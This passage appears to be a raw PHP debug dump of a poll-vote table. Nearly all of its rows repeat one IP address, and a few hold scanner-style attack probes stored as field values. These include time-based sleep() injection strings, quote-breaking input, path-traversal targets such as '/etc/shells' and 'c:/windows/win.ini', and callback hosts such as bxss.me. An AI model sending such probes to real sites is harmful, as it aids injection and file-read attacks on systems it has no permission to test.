'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2833 => array(
'id' => '3376',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2834 => array(
'id' => '3377',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2835 => array(
'id' => '3378',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2836 => array(
'id' => '3379',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2837 => array(
'id' => '3380',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2838 => array(
'id' => '3381',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2839 => array(
'id' => '3382',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2840 => array(
'id' => '3383',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2841 => array(
'id' => '3384',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2842 => array(
'id' => '3385',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2843 => array(
'id' => '3386',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2844 => array(
'id' => '3387',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2845 => array(
'id' => '3388',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2846 => array(
'id' => '3389',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2847 => array(
'id' => '3390',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2848 => array(
'id' => '3391',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2849 => array(
'id' => '3392',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2850 => array(
'id' => '3393',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2851 => array(
'id' => '3394',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2852 => array(
'id' => '3395',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2853 => array(
'id' => '3396',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2854 => array(
'id' => '3397',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2855 => array(
'id' => '3398',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2856 => array(
'id' => '3399',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2857 => array(
'id' => '3400',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2858 => array(
'id' => '3401',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2859 => array(
'id' => '3402',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2860 => array(
'id' => '3403',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2861 => array(
'id' => '3404',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2862 => array(
'id' => '3405',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2863 => array(
'id' => '3406',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2864 => array(
'id' => '3407',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2865 => array(
'id' => '3408',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2866 => array(
'id' => '3409',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2867 => array(
'id' => '3410',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2868 => array(
'id' => '3411',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2869 => array(
'id' => '3412',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2870 => array(
'id' => '3413',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2871 => array(
'id' => '3414',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2872 => array(
'id' => '3415',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2873 => array(
'id' => '3416',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2874 => array(
'id' => '3417',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2875 => array(
'id' => '3418',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2876 => array(
'id' => '3419',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2877 => array(
'id' => '3420',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2878 => array(
'id' => '3421',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2879 => array(
'id' => '3422',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2880 => array(
'id' => '3423',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2881 => array(
'id' => '3424',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2882 => array(
'id' => '3425',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2883 => array(
'id' => '3426',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2884 => array(
'id' => '3427',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2885 => array(
'id' => '3428',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2886 => array(
'id' => '3429',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2887 => array(
'id' => '3430',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2888 => array(
'id' => '3431',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2889 => array(
'id' => '3432',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2890 => array(
'id' => '3433',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2891 => array(
'id' => '3434',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2892 => array(
'id' => '3435',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2893 => array(
'id' => '3436',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2894 => array(
'id' => '3437',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2895 => array(
'id' => '3438',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2896 => array(
'id' => '3439',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2897 => array(
'id' => '3440',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2898 => array(
'id' => '3441',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2899 => array(
'id' => '3442',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2900 => array(
'id' => '3443',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2901 => array(
'id' => '3444',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2902 => array(
'id' => '3445',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2903 => array(
'id' => '3446',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2904 => array(
'id' => '3447',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2905 => array(
'id' => '3448',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2906 => array(
'id' => '3449',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2907 => array(
'id' => '3450',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2908 => array(
'id' => '3451',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2909 => array(
'id' => '3452',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2910 => array(
'id' => '3453',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2911 => array(
'id' => '3454',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2912 => array(
'id' => '3455',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2913 => array(
'id' => '3456',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2914 => array(
'id' => '3457',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2915 => array(
'id' => '3458',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2916 => array(
'id' => '3459',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2917 => array(
'id' => '3460',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2918 => array(
'id' => '3461',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2919 => array(
'id' => '3462',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2920 => array(
'id' => '3463',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2921 => array(
'id' => '3464',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2922 => array(
'id' => '3465',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2923 => array(
'id' => '3466',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2924 => array(
'id' => '3467',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2925 => array(
'id' => '3468',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2926 => array(
'id' => '3469',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2927 => array(
'id' => '3470',
'ip' => ''"()',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2928 => array(
'id' => '3471',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2929 => array(
'id' => '3472',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2930 => array(
'id' => '3473',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2931 => array(
'id' => '3474',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2932 => array(
'id' => '3475',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2933 => array(
'id' => '3476',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2934 => array(
'id' => '3477',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2935 => array(
'id' => '3478',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2936 => array(
'id' => '3479',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2937 => array(
'id' => '3480',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2938 => array(
'id' => '3481',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2939 => array(
'id' => '3482',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2940 => array(
'id' => '3483',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2941 => array(
'id' => '3484',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2942 => array(
'id' => '3485',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2943 => array(
'id' => '3486',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2944 => array(
'id' => '3487',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2945 => array(
'id' => '3488',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2946 => array(
'id' => '3489',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2947 => array(
'id' => '3490',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2948 => array(
'id' => '3491',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2949 => array(
'id' => '3492',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2950 => array(
'id' => '3493',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2951 => array(
'id' => '3494',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2952 => array(
'id' => '3495',
'ip' => 'https://scimat.dz/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2953 => array(
'id' => '3496',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2954 => array(
'id' => '3497',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2955 => array(
'id' => '3498',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2956 => array(
'id' => '3499',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2957 => array(
'id' => '3500',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2958 => array(
'id' => '3501',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2959 => array(
'id' => '3502',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2960 => array(
'id' => '3503',
'ip' => '45.137.76.29',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 2961 => array(
'id' => '3504',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2962 => array(
'id' => '3505',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2963 => array(
'id' => '3506',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2964 => array(
'id' => '3507',
'ip' => '45.137.76.29',
'ip1' => '<pre class='&&sleep(27*1000)*eeceyb&&'',
'sondage_id' => '2'
),
(int) 2965 => array(
'id' => '3508',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2966 => array(
'id' => '3509',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2967 => array(
'id' => '3510',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2968 => array(
'id' => '3511',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2969 => array(
'id' => '3512',
'ip' => '45.137.76.29',
'ip1' => '<pre class="&&sleep(27*1000)*lizxlt&&"',
'sondage_id' => '2'
),
(int) 2970 => array(
'id' => '3513',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2971 => array(
'id' => '3514',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2972 => array(
'id' => '3515',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2973 => array(
'id' => '3516',
'ip' => 'https://scimat.dz/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2974 => array(
'id' => '3517',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2975 => array(
'id' => '3518',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2976 => array(
'id' => '3519',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2977 => array(
'id' => '3520',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2978 => array(
'id' => '3521',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2979 => array(
'id' => '3522',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2980 => array(
'id' => '3523',
'ip' => '45.137.76.29',
'ip1' => '<pre class='||sleep(27*1000)*cjhamx||'',
'sondage_id' => '2'
),
(int) 2981 => array(
'id' => '3524',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2982 => array(
'id' => '3525',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2983 => array(
'id' => '3526',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2984 => array(
'id' => '3527',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2985 => array(
'id' => '3528',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2986 => array(
'id' => '3529',
'ip' => 'https://bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2987 => array(
'id' => '3530',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2988 => array(
'id' => '3531',
'ip' => '45.137.76.29',
'ip1' => '<pre class="||sleep(27*1000)*pgjsun||"',
'sondage_id' => '2'
),
(int) 2989 => array(
'id' => '3532',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2990 => array(
'id' => '3533',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2991 => array(
'id' => '3534',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2992 => array(
'id' => '3535',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2993 => array(
'id' => '3536',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2994 => array(
'id' => '3537',
'ip' => 'https://bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2995 => array(
'id' => '3538',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2996 => array(
'id' => '3539',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2997 => array(
'id' => '3540',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2998 => array(
'id' => '3541',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2999 => array(
'id' => '3542',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3000 => array(
'id' => '3543',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3001 => array(
'id' => '3544',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3002 => array(
'id' => '3545',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3003 => array(
'id' => '3546',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3004 => array(
'id' => '3547',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3005 => array(
'id' => '3548',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3006 => array(
'id' => '3549',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3007 => array(
'id' => '3550',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3008 => array(
'id' => '3551',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3009 => array(
'id' => '3552',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3010 => array(
'id' => '3553',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3011 => array(
'id' => '3554',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3012 => array(
'id' => '3555',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3013 => array(
'id' => '3556',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3014 => array(
'id' => '3557',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3015 => array(
'id' => '3558',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3016 => array(
'id' => '3559',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3017 => array(
'id' => '3560',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3018 => array(
'id' => '3561',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3019 => array(
'id' => '3562',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3020 => array(
'id' => '3563',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3021 => array(
'id' => '3564',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3022 => array(
'id' => '3565',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3023 => array(
'id' => '3566',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3024 => array(
'id' => '3567',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3025 => array(
'id' => '3568',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3026 => array(
'id' => '3569',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3027 => array(
'id' => '3570',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3028 => array(
'id' => '3571',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3029 => array(
'id' => '3572',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3030 => array(
'id' => '3573',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3031 => array(
'id' => '3574',
'ip' => '/etc/shells',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3032 => array(
'id' => '3575',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3033 => array(
'id' => '3576',
'ip' => 'https://bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3034 => array(
'id' => '3577',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3035 => array(
'id' => '3578',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3036 => array(
'id' => '3579',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3037 => array(
'id' => '3580',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3038 => array(
'id' => '3581',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3039 => array(
'id' => '3582',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3040 => array(
'id' => '3583',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3041 => array(
'id' => '3584',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3042 => array(
'id' => '3585',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3043 => array(
'id' => '3586',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3044 => array(
'id' => '3587',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3045 => array(
'id' => '3588',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3046 => array(
'id' => '3589',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3047 => array(
'id' => '3590',
'ip' => 'c:/windows/win.ini',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3048 => array(
'id' => '3591',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3049 => array(
'id' => '3592',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3050 => array(
'id' => '3593',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3051 => array(
'id' => '3594',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3052 => array(
'id' => '3595',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3053 => array(
'id' => '3596',
'ip' => 'bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3054 => array(
'id' => '3597',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3055 => array(
'id' => '3598',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3056 => array(
'id' => '3599',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3057 => array(
'id' => '3600',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3058 => array(
'id' => '3601',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3059 => array(
'id' => '3602',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3060 => array(
'id' => '3603',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3061 => array(
'id' => '3604',
'ip' => '45.137.76.29',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 3062 => array(
'id' => '3605',
'ip' => '45.137.76.29',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 3063 => array(
'id' => '3606',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3064 => array(
'id' => '3607',
'ip' => 'xfs.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3065 => array(
'id' => '3608',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3066 => array(
'id' => '3609',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 3067 => array(
'id' => '3610',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
